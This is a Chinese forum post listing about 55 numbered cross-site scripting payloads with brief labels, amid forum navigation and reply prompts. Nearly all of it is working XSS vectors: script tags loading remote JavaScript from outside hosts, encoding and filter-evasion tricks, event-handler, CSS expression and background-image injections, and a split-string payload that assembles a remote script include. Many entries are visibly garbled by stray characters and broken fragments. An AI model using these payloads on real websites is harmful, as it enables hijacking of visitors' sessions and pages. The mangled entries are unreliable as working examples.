找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2459|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入
1 f  l8 X& l% \) t& L- K( f$ C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! z  W: D" k) V2 p% n1 C
(99)另类弹框
( B: d2 U! [; {6 m
<q/oncut=alert()>1
% E6 s' G$ P1 ]<s/onclick=alert()>b7 h9 m: ]9 o% {* k6 D: L
<XSS=" onclick="alert(1)//">clickme</SSX=">$ F* i; f- y8 W- @  P
<zzz onclick=alert`1`>clickme</zzz> - _( Y2 z3 O/ R
<a onclick=alert`1`>clickme</a>; b8 k! v% n$ D9 b+ p! L- a/ d7 _: X) Q
<a=">clickme</a=">- H$ [" `- F6 ?( P% T. H
<a=">clickme</a>( k) ?, e% C+ G8 p% p& Q
<z=">clickme</z=">
4 ~/ d; q( k  ~) R<z onclick=alert`1`>clickme</z>* C1 F$ t- a9 w1 [) G+ ]

8 K0 C; U% y% A9 M(2)IMG标签XSS使用JavaScript命令
8 Z$ J! L% i! J+ |* E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- M7 ]' y9 U( {% j% A9 [
( D0 `6 [- G+ R6 G& I
(3)IMG标签无分号无引号
$ p6 p9 x8 h8 ?, V' E
<IMG SRC=javascript:alert(‘XSS’)>4 B" y! u, D( G# q+ C

0 y- F8 b$ ~0 O3 x$ y  E5 w3 k
(4)IMG标签大小写不敏感
  s" g. A  T3 _. J  Q0 h
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 m# z/ i  q4 ^5 V) `
, {! T3 r  \' K2 _" C1 a
(5)HTML编码(必须有分号)
: }4 Z/ n/ c- q5 ]( c' Y+ k8 l
<IMG SRC=javascript:alert(“XSS”)>2 M8 [& |9 p, K# f; E
7 V9 Q  S5 u' d
(6)修正缺陷IMG标签
' t$ |. {/ c# _% a
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 N7 j' {2 O; `  h

5 p; U  H' ~0 l0 d3 U. R
(7)formCharCode标签(计算器)
  ~( m, g4 m5 l4 Y, D9 N
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: y6 s. c3 Z8 l; M5 T, g

. `5 ?) z7 N9 ~! E# i! H* D# n. v
(8)UTF-8的Unicode编码(计算器)- Y4 K& V+ |- S5 X! O$ ~, u
<IMG SRC=jav..省略..S')>
9 M& C# n; ^) U, q) o3 E8 l' R. G2 N

# q4 N: l+ @4 I8 k
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* T3 P4 \& E3 j1 A
<IMG SRC=jav..省略..S')>
3 x1 s5 |/ n, }: N) o9 ~
  d% u1 O: `6 T3 H5 t
(10)十六进制编码也是没有分号(计算器)/ G0 w5 O: N( J/ e4 l3 l
<IMG SRC=\'#\'" /span>5 X- k' C$ e+ u* R& b- o

: d0 ^0 C! J- [7 |$ {, W(11)嵌入式标签,将Javascript分开
) E  m. l( J& `* G4 Z4 l: p. l3 [<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 G. B2 _- Y: w0 Q+ V2 ]) `& B4 C: e& D9 n# _
(12)嵌入式编码标签,将Javascript分开
0 S9 S9 F; D2 H<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 ?. g' T! G) M- s0 o+ i& o5 j5 w- l, J+ H* g
(13)嵌入式换行符
6 Z0 {" A( S! Q, p<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ U4 B  L. ?4 U0 V9 j
5 c& `( _/ d0 B, Z- n(14)嵌入式回车
6 N, F" ~. G8 c  P4 y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>2 ^, |# ~* ]3 [
$ Q7 a: e2 a) D9 T! H
(15)嵌入式多行注入JavaScript,这是XSS极端的例子5 d( A0 b$ @/ f+ k
<IMG SRC=\'#\'" /span>
4 j, Y- q& B" }7 u/ U+ c+ t% C
6 e! a! B: {, b(16)解决限制字符(要求同页面)8 p3 q# g# i1 g1 e  c
<script>z=’document.’</script>2 l+ [$ S3 Z1 G9 P
<script>z=z+’write(“‘</script>6 \" e8 o' z7 z( U: w
<script>z=z+’<script’</script>
8 ^: @/ G8 J; K<script>z=z+’ src=ht’</script>
! K& f" H3 [+ s# v2 \& o0 U4 c* J<script>z=z+’tp://ww’</script>
8 z* |8 b+ l! j1 T<script>z=z+’w.shell’</script>: q# C, j8 B7 i
<script>z=z+’.net/1.’</script>
& j8 J6 m4 w/ c8 q, E! ~/ y- b<script>z=z+’js></sc’</script>
( E3 k: f& g$ [- v3 ]<script>z=z+’ript>”)’</script>
0 D3 h5 z3 O0 b% `' q; p2 V9 `5 G# C$ e<script>eval_r(z)</script>3 p- s  [9 F* B. Z4 d  n  R. `. _
/ K2 ]) ?: g$ i* d3 j
(17)空字符
" E0 p# c0 p; X  m& [1 m3 wperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ p$ B9 `1 a2 O! R" F  b: E9 |* e, s4 F2 X! y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- {. K- ]% l! N+ i; T* Y, r
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out  |0 x; X* c" a# t1 ]

% b5 ~+ d  F) r(19)Spaces和meta前的IMG标签" \: t4 S7 j7 t) s9 L1 U
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>3 t- T" Y  r- A" d. w

- g% _# F9 m# V: @(20)Non-alpha-non-digit XSS% H) v# {9 ?( L& M* t
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. v1 |  ]% ]$ S3 X3 v
/ d" z; h  Y, H! d/ r(21)Non-alpha-non-digit XSS to 2
+ y5 j! Q- p* G( X; n4 f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 g. H; N* \- ?+ V, _: v

' G$ ]( s5 Q/ h$ A; G% B(22)Non-alpha-non-digit XSS to 38 E- w6 u; B2 g7 g/ @) P- x
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; l! A+ p. o% g6 R& ^/ G
7 x/ z1 U4 ?3 F7 `/ V! Z8 Z
(23)双开括号+ J# ]# s9 g( i+ ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: d- X. ?: o' v2 h0 a/ N1 T$ N6 M
9 Y2 w9 q2 O# ]* l  F" }/ {(24)无结束脚本标记(仅火狐等浏览器)
! T# y" C' ~3 R8 i0 E<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 U6 c) i& W  q: t) _, L% O) G" h8 m: s7 z! a7 F7 s" j
(25)无结束脚本标记2
2 ~" o/ }" n  O: @' E<SCRIPT SRC=//3w.org/XSS/xss.js>
0 k7 ^1 r2 o5 p* X' v' J
+ w, ~2 W' }' B+ Y- ^, g: l(26)半开的HTML/JavaScript XSS! [4 k* \- B; D* D2 E% p0 i" {
<IMG SRC=\'#\'" /span>) N8 D. s; A" l! Y0 B7 [9 T. ?
5 ?0 c% t5 l0 |. Z
(27)双开角括号
7 W: H+ y& f9 ?: I! b) M; }2 X<iframe src=http://3w.org/XSS.html <
: Y9 {7 G0 _# z5 m4 A4 D0 u
! A2 Q. n1 T+ v- h; G8 |(28)无单引号 双引号 分号; z# }. u1 ]1 r$ o! g
<SCRIPT>a=/XSS/
5 ?, j/ M* N( X, b* V1 T2 z3 Z8 ralert(a.source)</SCRIPT>
8 P. \* Z/ }7 z9 w4 Z' ?* A9 V( N0 F: n( O; J2 C3 g+ ^, o' D
(29)换码过滤的JavaScript
8 E7 ^4 t1 s7 k1 s- u2 e  _\”;alert(‘XSS’);//
8 a9 |5 y7 Y' H# C
0 [5 l  r9 N$ }* J; t(30)结束Title标签
+ c4 P. e/ J, q' Z  q0 w</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  r7 E* J9 X* o+ f! L! ?3 a$ g' E9 [. ?0 i1 G( N, Q
(31)Input Image
. y8 Q3 N  p# [2 U<INPUT SRC=\'#\'" /span>5 {8 g! z5 U6 N& R) g0 x9 Y
5 \8 [9 h8 F3 b; x+ o0 N* c5 Q
(32)BODY Image& g& k, i1 o* |6 ]1 i
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 e- w/ T; Z! o+ t
% ?6 L2 |5 a. J
(33)BODY标签
% C1 x; c" ], l' j/ b) ^<BODY(‘XSS’)>. C4 o; f- G) Y; c" C( ?. z/ N
' Y1 @/ Q% R: a% U; g) }
(34)IMG Dynsrc- q+ \  e$ a  ~3 r5 z0 D( Y7 q
<IMG DYNSRC=\'#\'" /span>
+ {- g0 ~& n' K, R  d3 a+ Y# H+ [" r/ f
(35)IMG Lowsrc
- ]# v; Z/ d& g' g/ ~6 b( ~<IMG LOWSRC=\'#\'" /span>
+ g: P% @1 H! n- Y. o
- E9 q' e. ^- k. \; P' M) a(36)BGSOUND
9 ^$ K, N! L( x4 F' w% j4 y7 ~7 U<BGSOUND SRC=\'#\'" /span>7 p" f1 z/ ^) a

6 p6 z1 B9 k2 Q, }(37)STYLE sheet
/ D/ p8 J6 M2 G  S<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 a$ b  E9 t' W" x/ i
2 z8 y) i' o. k" F5 s1 t6 }
(38)远程样式表
. s/ c6 A  O1 X' d" j<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. D/ N/ [- Y/ Z9 N: ^

4 c+ H5 M1 p: i2 p# Q1 e(39)List-style-image(列表式)! J2 x0 h9 p/ d
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 ?& [2 p% y# f' T$ D' E
( i1 Y9 H4 |. f! T! o. u
(40)IMG VBscript- c& {1 O9 l3 f! l- U$ s* o4 I
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS( M8 i! V% W6 h. c* k3 h
5 h1 [- u$ o* {! J
(41)META链接url
: \# ]  M5 V6 M; @9 ^5 B" R<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>% R3 F" @  u5 m9 o7 P1 _
) [2 {! `9 j& p% S$ X3 k6 F* y- X
(42)Iframe9 C$ A& ]  f7 ]/ t
<IFRAME SRC=\'#\'" /IFRAME>" Y9 h1 q' k2 w. H/ q' A% t

6 k+ C2 G) L* t, q2 C3 A(43)Frame9 e1 o( B9 J7 r+ q. t/ A# ^9 F9 b% G
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>$ P3 c4 Z( D4 n1 z" z
" U9 @; X0 K  C# {$ U+ W' i
(44)Table
4 k# g. C$ l- X' ^" C$ W: X& ^5 J: r<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ b! s" d7 ]# |6 \# k% I* r  G' t7 W5 x+ c  H" i2 [
(45)TD1 O! p% H6 K/ n* h; n0 N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! @1 y3 h/ S0 d0 s: |
' z) `# y2 w- D/ V3 M4 Z(46)DIV background-image3 f/ f5 W. G6 H2 t3 W
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ v! V+ z! q1 u0 ^

- N% I( v2 T, J- S, ^(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 Y  J# T3 ^2 n- b  e% g& S5 w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ }/ [  G6 Q" ^. ]% C* Y
- _( g! Y" d& I: \
(48)DIV expression
0 R1 S  b, i. N2 a7 t0 P7 N/ ?+ n<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 I! p9 M! F- h4 w$ b
- B  P$ P" y" Q4 Y0 W
(49)STYLE属性分拆表达
* _4 G" H1 |' m: O<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 C9 x0 N8 P3 b, x0 R+ I6 E9 d& b! @- o# A9 ], B$ u
(50)匿名STYLE(组成:开角号和一个字母开头)3 S! G% I: J! q! X0 ^/ j; H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, S" `, L* q' w0 w$ O( ?6 R
- a' X/ b8 r/ k3 c9 C! ](51)STYLE background-image% O* \" v' b' S6 }
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
9 W7 C# v4 }  B" O3 o9 q$ p4 o) O' ?
) Z7 [9 S. S" ?* v% Y; H$ ^(52)IMG STYLE方式
' Z4 ~* O' h9 i( o$ p, e- H1 yexppression(alert(“XSS”))’>
/ Y9 C6 N" P' L6 N5 ^
: |" m' Y5 J+ h0 E( i(53)STYLE background* t5 H+ y3 D0 V; s* y; e$ F+ T7 d
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' B, q1 c7 T4 b  o9 ~, ^
* J3 b1 F. B8 ~(54)BASE
: }5 k8 y  j4 s<BASE HREF=”javascript:alert(‘XSS’);//”>
' A) a) y/ L& c
! F; d) M4 ]+ b(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 g/ }4 @" g, k; z: u
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

. _8 b7 l, }7 L  K. e# P0 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表